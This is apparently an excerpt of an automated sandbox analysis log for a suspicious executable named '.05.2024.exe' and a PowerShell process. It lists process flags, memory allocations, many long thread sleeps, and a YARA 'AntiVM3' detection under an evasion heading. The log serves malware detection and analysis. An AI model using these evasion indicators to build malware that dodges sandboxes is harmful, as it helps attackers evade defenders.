Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR

Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 7D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 2420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 4420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 7140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 8140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 82F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 92F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Memory allocated: 46D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597678	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596197	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596060	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595932	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595322	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593857	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593750	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593641	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593527	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593422	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593188	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593032	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592922	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592812	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592701	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592594	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592451	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592033	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 591860	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 591735	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5652	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3979	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Window / User API: threadDelayed 3408	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Window / User API: threadDelayed 6388	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe TID: 1200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7412	Thread sleep count: 3408 > 30	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7412	Thread sleep count: 6388 > 30	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596197s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -596060s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -595932s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -595322s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593857s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593527s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -593032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -592922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -592812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -592701s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -592594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -592451s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -592033s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -591860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe TID: 7376	Thread sleep time: -591735s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598610	Jump to behavior
